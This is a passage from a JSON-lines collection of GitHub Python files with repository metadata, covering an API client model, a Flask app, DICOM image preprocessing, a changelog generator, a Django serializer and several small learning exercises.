UNSET\n created_on: Union[Unset, datetime.datetime] = UNSET\n updated_on: Union[Unset, datetime.datetime] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n type = self.type\n uuid = self.uuid\n title = self.title\n details = self.details\n external_id = self.external_id\n reporter = self.reporter\n link = self.link\n remote_link_enabled = self.remote_link_enabled\n logo_url = self.logo_url\n report_type: Union[Unset, str] = UNSET\n if not isinstance(self.report_type, Unset):\n report_type = self.report_type.value\n\n result: Union[Unset, str] = UNSET\n if not isinstance(self.result, Unset):\n result = self.result.value\n\n data: Union[Unset, List[Dict[str, Any]]] = UNSET\n if not isinstance(self.data, Unset):\n data = []\n for data_item_data in self.data:\n data_item = data_item_data.to_dict()\n\n data.append(data_item)\n\n created_on: Union[Unset, str] = UNSET\n if not isinstance(self.created_on, Unset):\n created_on = self.created_on.isoformat()\n\n updated_on: Union[Unset, str] = UNSET\n if not isinstance(self.updated_on, Unset):\n updated_on = self.updated_on.isoformat()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"type\": type,\n }\n )\n if uuid is not UNSET:\n field_dict[\"uuid\"] = uuid\n if title is not UNSET:\n field_dict[\"title\"] = title\n if details is not UNSET:\n field_dict[\"details\"] = details\n if external_id is not UNSET:\n field_dict[\"external_id\"] = external_id\n if reporter is not UNSET:\n field_dict[\"reporter\"] = reporter\n if link is not UNSET:\n field_dict[\"link\"] = link\n if remote_link_enabled is not UNSET:\n field_dict[\"remote_link_enabled\"] = remote_link_enabled\n if logo_url is not UNSET:\n field_dict[\"logo_url\"] = logo_url\n if report_type is not UNSET:\n field_dict[\"report_type\"] = report_type\n if result is not UNSET:\n field_dict[\"result\"] = result\n if data is not UNSET:\n field_dict[\"data\"] = data\n if created_on is not UNSET:\n field_dict[\"created_on\"] = created_on\n if updated_on is not UNSET:\n field_dict[\"updated_on\"] = updated_on\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n type = d.pop(\"type\")\n\n uuid = d.pop(\"uuid\", UNSET)\n\n title = d.pop(\"title\", UNSET)\n\n details = d.pop(\"details\", UNSET)\n\n external_id = d.pop(\"external_id\", UNSET)\n\n reporter = d.pop(\"reporter\", UNSET)\n\n link = d.pop(\"link\", UNSET)\n\n remote_link_enabled = d.pop(\"remote_link_enabled\", UNSET)\n\n logo_url = d.pop(\"logo_url\", UNSET)\n\n _report_type = d.pop(\"report_type\", UNSET)\n report_type: Union[Unset, ReportReportType]\n if isinstance(_report_type, Unset):\n report_type = UNSET\n else:\n report_type = ReportReportType(_report_type)\n\n _result = d.pop(\"result\", UNSET)\n result: Union[Unset, ReportResult]\n if isinstance(_result, Unset):\n result = UNSET\n else:\n result = ReportResult(_result)\n\n data = []\n _data = d.pop(\"data\", UNSET)\n for data_item_data in _data or []:\n data_item = ReportData.from_dict(data_item_data)\n\n data.append(data_item)\n\n _created_on = d.pop(\"created_on\", UNSET)\n created_on: Union[Unset, datetime.datetime]\n if isinstance(_created_on, Unset):\n created_on = UNSET\n else:\n created_on = isoparse(_created_on)\n\n _updated_on = d.pop(\"updated_on\", UNSET)\n updated_on: Union[Unset, datetime.datetime]\n if isinstance(_updated_on, Unset):\n updated_on = UNSET\n else:\n updated_on = isoparse(_updated_on)\n\n report = cls(\n type=type,\n uuid=uuid,\n title=title,\n details=details,\n external_id=external_id,\n reporter=reporter,\n link=link,\n remote_link_enabled=remote_link_enabled,\n logo_url=logo_url,\n report_type=report_type,\n result=result,\n data=data,\n created_on=created_on,\n updated_on=updated_on,\n )\n\n report.additional_properties = d\n return report\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"phitoduck/pulumi-bitbucket","sub_path":"bitbucket-api-client/bitbucket_api_client/models/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":7780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7458691429","text":"n = float(input('Dijite su número entero: '))\r\n# try:\r\n# except:\r\n \r\nentero = int(n) \r\nprint(entero)\r\nif entero == n:\r\n c = str(entero)\r\n suma = int(c) + int(c*2) + int(c*3)\r\n print('Su resultado es: ' + str(suma))\r\nelse:\r\n print('lo que dijitó no es un número entero')\r\n\r\n\r\n","repo_name":"edwardramirez31/Python-Coding-Lab","sub_path":"Semana1/Reto/Entregas/lunes_2200299/n + nn + nnn.py","file_name":"n + nn + nnn.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"11868733920","text":"'''\nDatasource for plain file.\nThis requires file in format:\n[url] 0 1\n[url] 1 0\nWhere:\n\"[url] 0 1\" means malicious url\n\"[url] 1 0\" means non-malicious url\n'''\nfrom datasource_base import BaseDatasource\n\nclass BasicFileDatasource(BaseDatasource):\n '''Basic file datasource class.'''\n\n def _load_data(self, source):\n '''Load data from basic file.'''\n file_in = open(source, 'r')\n content = file_in.read()\n examples = content.splitlines()\n\n dataset = dict()\n for example in examples:\n if len(example) > 3:\n url, y_1, y_2 = example.split(' ')\n dataset[url.lower()] = [float(y_1), float(y_2)]\n file_in.close()\n\n data_x = dataset.keys()\n data_y = [dataset[key] for key in data_x]\n return [data_x, data_y]\n\n def __init__(self, source, priority, active):\n super(BasicFileDatasource, self).__init__(source, priority, active)\n\n [self.data_x, self.data_y] = self._load_data(source)\n self.size = len(self.data_x)\n self.counter = 0\n\n def get_next_batch(self, batch_size):\n \"\"\"Get next batch of dataset samples.\"\"\"\n if batch_size > self.size:\n raise Exception(\"Dataset too small for batch size=\" + batch_size)\n\n if batch_size + self.counter > self.size:\n batch_x = self.data_x[self.counter:]\n batch_y = self.data_y[self.counter:]\n remaining = batch_size - (self.size - self.counter)\n self.counter = 0\n [rec_batch_x, rec_batch_y] = self.get_next_batch(remaining)\n\n batch_x.extend(rec_batch_x)\n batch_y.extend(rec_batch_y)\n\n else:\n batch_x = self.data_x[self.counter:self.counter + batch_size]\n batch_y = self.data_y[self.counter:self.counter + batch_size]\n self.counter += batch_size\n\n return [batch_x, batch_y]\n\n def get_all_data(self):\n return [self.data_x, self.data_y]\n","repo_name":"toniantunovi/url-ml","sub_path":"datasource/provider/datasource_basic_file.py","file_name":"datasource_basic_file.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7912677257","text":"from flask import Flask, send_from_directory\nfrom src.controller import Controller\nfrom logging.config import fileConfig\nfrom config.load_config import load_config\nfrom typing import Optional\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom flask_cors import CORS\nfrom src.register_api_call_decorator import set_statistics_database\n\n\nfileConfig('config/logging_conf.ini')\n\nDEFAULT_CONFIG_FILE = \"config/default_conf.yml\"\nSWAGGER_URL = \"/swagger\"\nAPI_URL = \"/static/swagger.yaml\"\n\n\ndef create_application(config_path: Optional[str] = None):\n \"\"\"\n Creates the flask application\n\n :param config_path: the path to the configuration\n :return: a Flask app\n \"\"\"\n if not config_path:\n config_path = DEFAULT_CONFIG_FILE\n config = load_config(config_path)\n set_statistics_database(config.statistics_database)\n controller = Controller(config.auth_server,config.media_server,\n config.video_database,config.friend_database,\n config.statistics_database,\n config.notifications_database)\n return create_application_with_controller(controller)\n\ndef create_application_with_controller(controller: Controller):\n app = Flask(__name__)\n\n swaggerui_blueprint = get_swaggerui_blueprint(SWAGGER_URL, API_URL,\n config= {\"app_name\": \"Chotuve App Server\"})\n\n app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)\n\n cors = CORS(app, resources={\"/user\": {\"origins\": \"*\"},\n \"/user/recover_password\": {\"origins\": \"*\"},\n \"/user/new_password\": {\"origins\": \"*\"},\n \"/user/login\": {\"origins\": \"*\"},\n \"/users\": {\"origins\": \"*\"},\n \"/user/video\": {\"origins\": \"*\"},\n \"/api_call_statistics\": {\"origins\": \"*\"},\n \"/videos\": {\"origins\": \"*\"},\n \"/app_servers\": {\"origins\": \"*\"}})\n\n app.add_url_rule('/health', 'api_health', controller.api_health)\n app.add_url_rule('/users', 'registered_users', controller.registered_users,\n methods=[\"GET\"])\n app.add_url_rule('/user', 'users_register', controller.users_register,\n methods=[\"POST\"])\n app.add_url_rule('/user/login', 'users_login', controller.users_login,\n methods=[\"POST\"])\n app.add_url_rule('/user/login', 'login_get', controller.login_get,\n methods=[\"GET\"])\n app.add_url_rule('/user', 'users_profile_query',\n controller.users_profile_query, methods=['GET'])\n app.add_url_rule('/user', 'users_delete',\n controller.users_delete, methods=['DELETE'])\n app.add_url_rule('/user', 'users_profile_update',\n controller.users_profile_update, methods=['PUT'])\n app.add_url_rule('/user/recover_password', 'users_recover_password',\n controller.users_send_recovery_email, methods=[\"POST\"])\n app.add_url_rule('/user/new_password', 'users_new_password',\n controller.users_recover_password, methods=[\"POST\"])\n\n app.add_url_rule('/user/video', 'users_upload_video',\n controller.users_video_upload, methods=[\"POST\"])\n app.add_url_rule('/user/video', 'users_delete_video',\n controller.users_video_delete, methods=[\"DELETE\"])\n app.add_url_rule('/user/videos', 'users_list_videos',\n controller.users_list_videos, methods=[\"GET\"])\n app.add_url_rule('/videos', 'list_videos',\n controller.list_videos, methods=[\"GET\"])\n app.add_url_rule('/videos/top', 'list_top_videos',\n controller.list_top_videos, methods=[\"GET\"])\n app.add_url_rule('/videos/search', 'search_videos',\n controller.search_videos, methods=[\"GET\"])\n app.add_url_rule('/videos/reaction', 'video_reaction_get',\n controller.video_reaction_get, methods=[\"GET\"])\n app.add_url_rule('/videos/reaction', 'video_reaction',\n controller.video_reaction, methods=[\"POST\"])\n app.add_url_rule('/videos/reaction', 'video_reaction_delete',\n controller.video_reaction_delete, methods=[\"DELETE\"])\n app.add_url_rule('/videos/comment', 'comment_video',\n controller.comment_video, methods=[\"POST\"])\n app.add_url_rule('/videos/comments', 'get_video_comments',\n controller.get_video_comments, methods=[\"GET\"])\n\n\n app.add_url_rule('/user/friend_request', 'user_send_friend_request',\n controller.user_send_friend_request, methods=[\"POST\"])\n app.add_url_rule('/user/friend_request/accept', 'user_accept_friend_request',\n controller.user_accept_friend_request, methods=[\"POST\"])\n app.add_url_rule('/user/friend_request/reject', 'user_reject_friend_request',\n controller.user_reject_friend_request, methods=[\"POST\"])\n app.add_url_rule('/user/friend_requests', 'user_list_friend_requests',\n controller.user_list_friend_requests, methods=[\"GET\"])\n app.add_url_rule('/user/friends', 'user_list_friends',\n controller.user_list_friends, methods=[\"GET\"])\n app.add_url_rule('/user/friend', 'delete_friendship',\n controller.delete_friendship, methods=[\"DELETE\"])\n app.add_url_rule('/user/friendship_status_with', 'friendship_status_with',\n controller.friendship_status_with, methods=[\"GET\"])\n\n app.add_url_rule('/user/message', 'user_send_message',\n controller.send_message, methods=[\"POST\"])\n app.add_url_rule('/user/messages_with', 'user_list_messages',\n controller.get_messages, methods=[\"GET\"])\n app.add_url_rule('/user/messages_with', 'user_delete_messages',\n controller.delete_messages, methods=[\"DELETE\"])\n app.add_url_rule('/user/last_conversations', 'last_conversations',\n controller.get_last_conversations, methods=[\"GET\"])\n\n app.add_url_rule('/api_call_statistics', 'api_call_statistics',\n controller.api_call_statistics, methods=[\"GET\"])\n\n app.add_url_rule('/app_servers', 'app_servers',\n controller.app_server_statuses, methods=[\"GET\"])\n\n return app\n","repo_name":"jian01/taller2-app-server","sub_path":"create_application.py","file_name":"create_application.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37038746408","text":"import numpy as np\nimport pandas as pd\nimport os\nimport click\nimport glob\nimport cv2\nimport pydicom\nfrom tqdm import tqdm\nfrom joblib import delayed, Parallel\nimport random\nimport pydicom\nfrom scipy import ndimage\nimport pydicom\nfrom skimage import exposure\n\n\ndef window_image(img, window_center, window_width, intercept, slope):\n img = (img * slope + intercept)\n img_min = window_center - window_width // 2\n img_max = window_center + window_width // 2\n img[img < img_min] = img_min\n img[img > img_max] = img_max\n return img\n\n\ndef get_first_of_dicom_field_as_int(x):\n # get x[0] as in int is x is a 'pydicom.multival.MultiValue', otherwise get int(x)\n if type(x) == pydicom.multival.MultiValue:\n return int(x[0])\n else:\n return int(x)\n\n\ndef get_windowing(data):\n dicom_fields = [data[('0028', '1050')].value, # window center\n data[('0028', '1051')].value, # window width\n data[('0028', '1052')].value, # intercept\n data[('0028', '1053')].value] # slope\n return [get_first_of_dicom_field_as_int(x) for x in dicom_fields]\n\n\n@click.group()\ndef cli():\n print(\"CLI\")\n\n\nwindows_range = {\n 'brain': [40, 80],\n 'bone': [600, 2800],\n 'subdual': [75, 215]\n}\n\n\ndef refine_label(label_mask):\n label_mask = label_mask.astype(np.bool)\n # Fill hole\n label_mask = ndimage.binary_fill_holes(label_mask)\n # Get largest connected component\n label_im, nb_labels = ndimage.label(label_mask)\n sizes = ndimage.sum(label_mask, label_im, range(nb_labels + 1))\n mask_size = sizes < max(sizes)\n remove_pixel = mask_size[label_im]\n label_im[remove_pixel] = 0\n labels = np.unique(label_im)\n label_mask = np.searchsorted(labels, label_im)\n return label_mask\n\n\ndef cut_edge(image, keep_margin):\n '''\n function that cuts zero edge\n '''\n H, W = image.shape\n H_s, H_e = 0, H - 1\n W_s, W_e = 0, W - 1\n\n while H_s < H:\n if image[H_s, :].sum() != 0:\n break\n H_s += 1\n while H_e > H_s:\n if image[H_e, :].sum() != 0:\n break\n H_e -= 1\n while W_s < W:\n if image[:, W_s].sum() != 0:\n break\n W_s += 1\n while W_e > W_s:\n if image[:, W_e].sum() != 0:\n break\n W_e -= 1\n if keep_margin != 0:\n H_s = max(0, H_s - keep_margin)\n H_e = min(H - 1, H_e + keep_margin)\n W_s = max(0, W_s - keep_margin)\n W_e = min(W - 1, W_e + keep_margin)\n return int(H_s), int(H_e) + 1, int(W_s), int(W_e) + 1\n\n\ndef pre_preocessing(image, pad_size=(512, 512)):\n # Convert to [0, 255]\n # image = (image-image.min()) / (image.max() - image.min())\n # image= image*255\n image[image < 0] = 0\n # Remove unwanted region\n mask = image > 0\n mask = refine_label(mask)\n image = image * mask\n # Center crop and pad to size\n # mask = image>0\n # min_H_s, max_H_e, min_W_s, max_W_e = cut_edge(mask, 32)\n # image = image[min_H_s: max_H_e, min_W_s:max_W_e]\n # Pad to size\n H, W = image.shape\n pad_H, pad_W = pad_size[0], pad_size[1]\n pad_H0 = max((pad_H - H) // 2, 0)\n pad_H1 = max(pad_H - H - pad_H0, 0)\n pad_W0 = max((pad_W - W) // 2, 0)\n pad_W1 = max(pad_W - W - pad_W0, 0)\n image = np.pad(image, [(pad_H0, pad_H1), (pad_W0, pad_W1)], mode='constant', constant_values=0)\n return image\n\n\ndef convert_dicom_to_jpg(dicomfile, outputdir):\n try:\n data = pydicom.read_file(dicomfile)\n image = data.pixel_array\n window_center, window_width, intercept, slope = get_windowing(data)\n id = dicomfile.split(\"/\")[-1].split(\".\")[0]\n\n images = []\n # count =0\n\n for k, v in windows_range.items():\n image_windowed = window_image(image, v[0], v[1], intercept, slope)\n image_windowed = pre_preocessing(image_windowed, pad_size=(512, 512))\n images.append(image_windowed)\n\n # image_windowed = exposure.equalize_adapthist(image_windowed, clip_limit=0.01)\n # min_value= image_windowed.min()\n # max_value = image_windowed.max()\n # print (image_windowed.min(),image_windowed.max())\n # if count ==0:\n # image_windowed=np.uint8(image_windowed)\n # clahe = cv2.createCLAHE(clipLimit = 1.0, tileGridSize = (8,8))\n # image_windowed = clahe.apply(image_windowed)\n # images.append(image_windowed)\n # print (image_windowed.min(),image_windowed.max())\n # count +=1\n images = np.asarray(images).transpose((1, 2, 0))\n # print (images.shape)\n\n output_image = os.path.join(outputdir, id + \".jpg\")\n cv2.imwrite(output_image, images)\n except:\n print(dicomfile)\n\n\n@cli.command()\n@click.option('--inputdir', type=str)\n@click.option('--outputdir', type=str)\ndef extract_images(\n inputdir,\n outputdir,\n):\n os.makedirs(outputdir, exist_ok=True)\n files = glob.glob(inputdir + \"/*.dcm\")\n Parallel(n_jobs=8)(delayed(convert_dicom_to_jpg)(file, outputdir) for file in tqdm(files, total=len(files)))\n\n\ndef split_by_patient(\n train_csv,\n train_meta_csv,\n n_folds,\n outdir\n):\n os.makedirs(outdir, exist_ok=True)\n train_df = pd.read_csv(train_csv)\n train_meta_df = pd.read_csv(train_meta_csv)\n train_meta_df['ID'] = train_meta_df['ID'].apply(lambda x: \"_\".join(x.split(\"_\")[:2]))\n train_meta_df = train_meta_df[['ID', 'PatientID']]\n\n\nif __name__ == '__main__':\n cli()","repo_name":"ngxbac/Kaggle-RSNA","sub_path":"src/preprocessing_3w.py","file_name":"preprocessing_3w.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"72"} +{"seq_id":"16585097467","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport re\nimport sys\nfrom enum import Enum, auto\nfrom subprocess import PIPE, Popen\n\n\nclass Commit:\n\n def __init__(self, version_tag=None, commit_hash=None, commit_msg=None, commit_type=None, commit_category=None,\n commit_description=None):\n self.version_tag = version_tag\n self.commit_hash = commit_hash\n self.commit_msg = commit_msg\n self.commit_type = commit_type\n self.commit_category = commit_category\n self.commit_description = commit_description\n\n\nclass Type(Enum):\n BREAK = auto()\n BUILD = auto()\n DOCS = auto()\n FEAT = auto()\n FIX = auto()\n IMP = auto()\n MISC = auto()\n PERF = auto()\n REFAC = auto()\n TEST = auto()\n\n\ndef consent_overwrite():\n overwrite = input('Do you want to overwrite it? [Y/n]: ').upper()\n if overwrite == 'Y' or overwrite == '':\n return True\n elif overwrite == 'N':\n return False\n else:\n print('invalid input')\n return consent_overwrite()\n\n\nTYPE_TEXT = {\n Type.BREAK.name: 'Breaking Changes',\n Type.BUILD.name: 'Build and Dependency Changes',\n Type.DOCS.name: 'Documentation Changes',\n Type.FEAT.name: 'New Features',\n Type.FIX.name: 'Bugfixes',\n Type.IMP.name: 'Improvement of existing Features',\n Type.MISC.name: 'Miscellaneous',\n Type.PERF.name: 'Performance Improvements',\n Type.REFAC.name: 'Refactoring',\n Type.TEST.name: 'Tests'\n}\n\nCLOGG_VERSION = \"v1.4.0\"\nVERSION_PATTERN = re.compile('v?[0-9]+\\.[0-9]+\\.[0-9]+(-([0-9A-Za-z-]+(\\.[0-9A-Za-z-]+)*))?')\nTYPE_PATTERN = re.compile('^\\[[a-zA-Z]{3,5}\\]')\nCATEGORY_PATTERN = re.compile('\\[[a-zA-Z\\d\\ ]+\\]')\n\n# reading CLI arguments\nparser = argparse.ArgumentParser(prog='clogg',\n description=\"A simple CLI tool for generating changelogs\"\n \" from git commits and version tags.\")\n\nparser.add_argument('-v', action='store_true', help='return the installed version of clogg')\nparser.add_argument('-a', action='store_true', help='append the generated changelog to an existing file')\nparser.add_argument('-d', help='root directory of the git project, defaults to ./', metavar='', default=\"./\")\n# parser.add_argument('-e', help='version tag where the changelog should end', metavar='')\nparser.add_argument('-f', action='store_true', help='force override existing output file', default=False)\nparser.add_argument('-o', help='output for the changelog file, defaults to ./CHANGELOG.md', metavar='',\n default='./CHANGELOG.md')\nparser.add_argument('-c', action='store_true', help='enables ClogG footer at the end of the genrated changelog')\nparser.add_argument('-t', action='store_true', help='list all available tags and their descriptions')\nparser.add_argument('-p', action='store_true', help='enables prettifier to remove colons at the beginning of messages')\n# parser.add_argument('-s', help='version tag where teh changelog should start', metavar='')\n\nargs = parser.parse_args()\n\n# handling -v argument\nif args.v:\n print('clogg ' + CLOGG_VERSION)\n sys.exit(0)\n\nif args.t:\n tags = [t.name for t in Type]\n tags.sort()\n for tag in tags:\n print('\\033[36m'+ tag + '\\033[0m' + ':\\t' + TYPE_TEXT[tag])\n sys.exit(0)\n\n# changing working directory\ntry:\n os.chdir(args.d)\nexcept FileNotFoundError as e:\n print('error: directory ' + args.d + ' not found')\n sys.exit(1)\n\n# reading git log data\np = Popen(['git', 'log', '-E', '--format=@@DEC%d@@CMS %s@@CID %H@@CMD %b'], stdin=PIPE, stdout=PIPE,\n stderr=PIPE)\noutput, err = p.communicate()\n\n# handling git log errors\nif err:\n print('error: directory ' + os.getcwd() + ' is not a git repository')\n sys.exit(1)\n\noutput = output.decode('utf-8').split('@@')\n\n# parsing commits\ncommits = []\nversions = []\ncur_commit = Commit()\nfor entry in output:\n if entry[:3] == 'DEC':\n match = VERSION_PATTERN.search(entry)\n if match:\n cur_commit.version_tag = match.group(0)\n versions.append(match.group(0))\n elif entry[:3] == 'CMS':\n match = TYPE_PATTERN.search(entry[4:])\n if match:\n cur_commit.commit_type = match.group(0)[1:-1].upper()\n cur_commit.commit_msg = entry[4 + len(match.group(0)):].strip()\n if args.p:\n cur_commit.commit_msg = cur_commit.commit_msg.strip(':').strip()\n elif entry[:3] == 'CID':\n cur_commit.commit_hash = entry[4:]\n elif entry[:3] == 'CMD':\n match = CATEGORY_PATTERN.search(entry[4:])\n if match:\n cur_commit.commit_category = match.group(0)[1:-1].strip()\n cur_commit.commit_description = entry[4 + len(match.group(0)):].strip()\n else:\n cur_commit.commit_description = entry[4:].strip()\n if cur_commit.commit_type:\n commits.append(cur_commit)\n version_tag_tmp = cur_commit.version_tag\n cur_commit = Commit()\n cur_commit.version_tag = version_tag_tmp\n\n# check if changelog file exist and get consent to overwrite\nif os.path.exists(args.o) and not (args.f or args.a):\n print('the file ' + os.path.abspath(args.o) + ' already exists')\n if not consent_overwrite():\n sys.exit(0)\n\n# open changelog file\ntry:\n if args.a:\n changelog = open(args.o, 'a', -1)\n else:\n changelog = open(args.o, 'w', -1)\n changelog.write('# Changelog \\n\\n')\nexcept PermissionError:\n print('error: please make sure you have permission to edit ' + os.path.abspath(args.o))\n sys.exit(1)\n\nfor version in versions:\n changelog.write('## ' + version + ' \\n\\n')\n version_set = [n for n in commits if n.version_tag == version]\n for name in Type.__members__.keys():\n type_set = [n for n in version_set if n.commit_type == name]\n if len(type_set) > 0:\n changelog.write('### ' + TYPE_TEXT[name] + ' \\n\\n')\n for change in type_set:\n string = '- '\n if change.commit_category:\n string += '**' + change.commit_category + ':** '\n string += change.commit_msg.replace('\\n', '\\n >')\n string += ' (' + change.commit_hash[:7] + ') \\n'\n if change.commit_description:\n string += ' >' + change.commit_description + '\\n\\n'\n else:\n string += '\\n'\n changelog.write(string)\n\nif args.c :\n changelog.write('\\n \\n--- \\n This changelog was generated using [ClogG](https://github.com/0x4287/changelog-generator).')\n\nchangelog.close()\nprint('successfully created changelog at: ', os.path.abspath(args.o))\nsys.exit(0)\n","repo_name":"0x4287/changelog-generator","sub_path":"src/clogg.py","file_name":"clogg.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31997662202","text":"categorias = (\n 'Pobreza',\n 'Hambre',\n 'Salud',\n 'Educación',\n 'Igualdad de Género',\n 'Agua',\n 'Energía',\n 'Economía',\n 'Infraestructura',\n 'Desigualdad',\n 'Ciudades',\n 'Consumo',\n 'Cambio Climatico',\n 'Océanos',\n 'Biodiversidad',\n 'Paz - Justicia ',\n 'Aliazas')\n\nCategorias = [\n ('Pobreza','Pobreza'),\n ('Hambre','Hambre'),\n ('Salud','Salud'),\n ('Educación','Educación'),\n ('Igualdad de Género','Igualdad de Género'),\n ('Agua','Agua'),\n ('Energía','Energía'),\n ('Economía','Economía'),\n ('Infraestructura','Infraestructura'),\n ('Desigualdad','Desigualdad'),\n ('Ciudades','Ciudades'),\n ('Consumo','Consumo'),\n ('Cambio Climatico','Cambio Climatico'),\n ('Océanos','Océanos'),\n ('Biodiversidad','Biodiversidad'),\n ('Paz - Justicia ','Paz - Justicia '),\n ('Aliazas','Aliazas')\n ]","repo_name":"MaregaAugusto/blog-django","sub_path":"blog/apps/utils/enum/categorias.py","file_name":"categorias.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19886725461","text":"#序列化器\nfrom rest_framework import serializers\nfrom django_redis import get_redis_connection\nclass VerificationSerializer(serializers.Serializer):\n \"\"\"短息验证码序列化器\"\"\"\n\n #定义序列化字段\n #图片验证码\n text = serializers.CharField(max_length=4,min_length=4)\n #图片验证码的uuid\n image_code_id = serializers.UUIDField()\n\n # print(text,image_code_id)\n #定义校验器\n def validate(self, attrs):\n \"\"\"验证图片验证码\"\"\"\n\n #获取请求数据 获取用户输入的图片验证码\n image_code_id = attrs.get('image_code_id')\n print('222222%s'%image_code_id)\n text = attrs.get('text')\n\n #根据前端的图片验证码的uuid从redis数据库中查找对应验证码\n #连接redis的图片验证码库\n redis_conn = get_redis_connection('verification')\n #获取真实的图片验证码 从数据库取出来的数据byte类型\n try:\n img_content = redis_conn.get('img_%s'% image_code_id).decode()\n except:\n raise serializers.ErrorDetail('请输入短信验证码')\n\n #判断是否图片验证码是否过期\n if not img_content:\n raise serializers.ErrorDetail('图片验证码过期')\n\n #删除redis数据库中的图片验证码\n redis_conn.delete('img_%s'% image_code_id)\n\n #校验用户输入的图片验证码\n if text.lower() != img_content.lower():\n print(text.lower(), img_content.lower())\n raise serializers.ErrorDetail('图片验证码错误')\n\n #用户手机号码是不是60秒内有发送的记录 限定一分钟内不能重复发短信验证码\n #查询数据库有该用户手机号的发短信验证码记录\n #获取用户手机号 通过序列器对象的上下文context获取视图对象 再根据视图对象获取视图的moblie参数\n # kwargs 是序列化器帮助我们是自己实现的一个类字典的封装\n # 视图对象初始化时将**kwargs的数据封装到kwargs类字典中\n # 视图对象初始化时将*args的数据封装到args元组中\n mobile = self.context['view'].kwargs['mobile']\n\n #通过序列化器对象的context属性或取请求对象request,视图对象view,请求数据格式format\n # print(self.context['view'])\n # print(self.context['view'].kwargs)\n # print(self.context['view'].args)\n # print('...')\n # print(self.context['request'])\n # print(self.context['request'].data)\n # print(self.context['request'].query_params)\n # print('...')\n # print(self.context['format'])\n sms_send_flag = redis_conn.get(\"sms_send_flag_%s\"%mobile)\n\n #检查用户的手机号是不是在一分钟内获取过短信验证码\n if sms_send_flag:\n raise serializers.ErrorDetail('请求次数过于频繁')\n\n\n return attrs","repo_name":"wahello/project","sub_path":"meiduomall/meiduomall/meiduomall/apps/verifications/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23484167365","text":"from sys import argv\r\nfrom os.path import exists\r\n\r\nscript, from_file, to_file = argv\r\n\r\nprint(f\"Copying from {from_file} to {to_file}\")\r\n\r\n# we could do these two on one line, how?\r\nin_file = open(from_file)\r\nindata = in_file.read()\r\n\r\n# New lines in the multi-line string AND \\n will give me two new lines (I only wanted one)\r\nprint(f\"\"\"\r\n Some information:\\n\r\n The input file is {len(indata)} bytes long\\n\r\n Output file already exists--T or F: {exists(to_file)}\r\n \"\"\")\r\n\r\n# So basically, in my mind, input() pauses a script at that point. So removing input() will allow the script to proceed uninterrupted.\r\n# print(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\r\n# input()\r\n\r\nout_file = open(to_file, 'w')\r\nout_file.write(indata)\r\n\r\nout_file.close()\r\nin_file.close()\r\n","repo_name":"uwl-python-ig/lp3thw","sub_path":"ex17/bmr_ex17_sd1.py","file_name":"bmr_ex17_sd1.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36546301467","text":"import logging\nfrom typing import List\n\n# Commented this out as it was overriding debugging to info where I was calling this Utility Codes while debugging\n# logging.basicConfig(level=logging.INFO)\n\n\ndef printMatrix(matrix: List[List[int]], Rows: int = 0, Columns: int = 0, row: int = 0, column: int = 0) -> None:\n \"\"\"\n :param matrix: Matrix in the for of Array of Arrays\n :param Rows: Max Rows Available\n :param Columns: Max Columns Available\n :param row: From which row we have to print it\n :param column: From Which column we have to print it\n :return: None\n \"\"\"\n\n if Rows == 0 and Columns == 0:\n Rows, Columns = gettingRowColumn(matrix)\n\n if row > Rows and column > Columns:\n logging.info(\" Wrong Input Parameters. Please Try Again\")\n return\n\n logging.debug(\"Printing Matrix from row {} to Rows {} and column {} to Columns {} \".format(\n row, Rows, column, Columns\n ))\n\n for indexI in range(row, Rows):\n for indexJ in range(column, Columns):\n print(f'{matrix[indexI][indexJ]:03}', end=\" \")\n # print(\"{}\".format(matrix[indexI][indexJ], '03'), end=\" \")\n print()\n\n\ndef gettingRowColumn(matrix):\n rows = len(matrix)\n if rows:\n columns = len(matrix[0])\n else:\n columns = None\n\n return rows, columns\n\n","repo_name":"sakshamratra0106/PracticeProblems","sub_path":"DSAPracticeSheets/Matrix/MatrixUtility.py","file_name":"MatrixUtility.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37092495301","text":"a=open(r'C:\\Users\\prake\\Desktop\\AIML\\diabetes_data_upload.csv','r')\r\nb=a.readlines()\r\na.close()\r\nc=[]\r\nfor i in b:\r\n c.append(i.split(','))\r\nd={}\r\nfor i in c:\r\n if i[1] not in 